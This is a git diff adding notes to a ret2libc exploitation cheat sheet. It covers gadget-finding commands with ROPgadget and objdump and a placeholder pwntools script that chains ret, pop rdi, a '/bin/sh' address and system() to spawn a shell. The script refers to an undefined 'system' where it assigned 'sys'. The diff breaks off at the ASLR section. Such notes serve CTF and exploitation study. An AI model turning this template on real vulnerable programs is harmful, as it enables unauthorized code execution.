diff --git a/exploit/binaries/ret2libc.md b/exploit/binaries/ret2libc.md
index 912b5d9..eb1ad88 100644
--- a/exploit/binaries/ret2libc.md
+++ b/exploit/binaries/ret2libc.md
@@ -41,7 +41,42 @@ readelf -s /lib32/libc.so.6 | grep system
     * Architecture
     * Calling convention
 
-## Usage
+### Manually
+
+```sh
+ROPgadget --binary <file> | grep rdi
+```
+* Find `ret`s, to put in front of rdi
+```sh
+objdump -d <file> | grep ret
+```
+
+## Example without ASLR
+```python
+from pwn import *
+
+p = process('<binary>')
+
+cbase = 0x<libc_base>
+sys = cbase + <libc_system>
+sh = cbase + <libc_shell>
+rop_rdi = <found rop rdi>
+rop_ret = <found rop ret>
+
+payload =  b'A' * <count>
+payload += b'B' * 8
+payload += p64(rop_ret)
+payload += p64(rop_rdi)
+payload += p64(sh)
+payload += p64(system)
+payload += p64(0x0) # end payload
+
+p.recv()
+p.sendline(payload)
+p.interactive()
+```
+
+## Example with ASLR
 * Create context
 ```python
 #!/usr/bin/env python3